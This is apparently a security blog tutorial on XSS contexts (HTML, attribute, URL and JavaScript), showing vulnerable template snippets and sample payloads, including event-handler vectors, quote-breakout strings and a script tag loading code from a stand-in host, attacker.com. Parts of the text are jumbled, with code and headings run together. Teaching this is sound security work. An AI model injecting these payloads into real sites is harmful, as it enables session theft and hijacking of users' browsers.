Hey Everyone! been a long time since the last post :\ all due to laziness of Zen. So continuing the series, we are gonna talk about different contexts where XSS could occur.
First of all what are XSS contexts?
Contexts for XSS are nothing but the situations or the places/positions where the user input might reflect inside the DOM and if not sanitised or properly encoded then may lead to XSS.
Basic types of contexts where XSS could occur could be:
1. HTML context
2. Attribute context
3. URL context
4. Javascript context
#1. HTML context
This is the simplest contexts where XSS could occur. Its nothing but when the unsanitized userinput is put into the response body as is. This occurs when angular brackets/tags (< or >) are not at all sanitized.
Example:
1. title Example:
    
        
<!DOCTYPE HTML>
<html>
<head>
<title>HTML Context</title>
</head>
<body>
{{userinput}}
</body>
</html>
<script src=//attacker.com/evil.js></script>
<script>alert(1)</script>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe onload=alert(1)>1. title Example:
<!DOCTYPE HTML>
..
<title>{{userinput}}</title>
..
<!DOCTYPE HTML>
..
<textarea>{{userinput}}</textarea>
..
<!DOCTYPE HTML>
<html>
<head>
<title></title>
</head>
<body>
.....
...
<input type="" name="input" value="{{user input}}"> <!-- double quoted -->
<input type="" name="input" value='{{user input}}'> <!-- single quoted -->
<input type="" name="input" value={{user input}}> <!-- without quotations -->
...
....
</body>
</html>
<!DOCTYPE HTML>
<html>
..
<input type="hidden" value="{{userinput}}" />
..
</html>
<!DOCTYPE HTML>
<html>
..
<input value="{{userinput}}" type="hidden"/> <!-- notice the position of userinput before type -->
..
</html>
<!DOCTYPE HTML>
<html>
..
<input disabled value="{{userinput}}" />
..
</html>
<script src="{{userinput}}"></script>
<a href="{{userinput}}">Click</a>
<iframe src="{{userinput}}" />
<base href="{{userinput}}">
<form action={{userinput}}>
...
<button>X</button>
<frameset><frame src="{{userinput}}"></frameset>
<!DOCTYPE HTML>
<html>
..
<script>
var x="{{userinput}}";// break out of quotes accordingly if its double or single
..
...
</script>
..
</html>
`";alert(1)//`
`"-alert(1)-"`
`"+alert(1)+"`
`"*alert(1)*"`
<!DOCTYPE HTML>
<html>
..
<script>
var x={{userinput}};
..
...
</script>
..
</html>
<!DOCTYPE HTML>
<html>
..
<script>
var x=123;
function test(){
if(test =='{{userinput}}'){
//something
}
else
{
//something
}
}
test();
</script>
..
</html>
function test(){
if(test =='test'){//'){
//something
}
else
{
//something
}
}
function test(){
if(test =='test'){1}}//'){
//something
}
else
{
//something
}
}
function test(){
if(test =='test'){1}};alert(1);dummy=>{ if(1){//'){1}}//'){
//something
}
else
{
//something
}
} 
            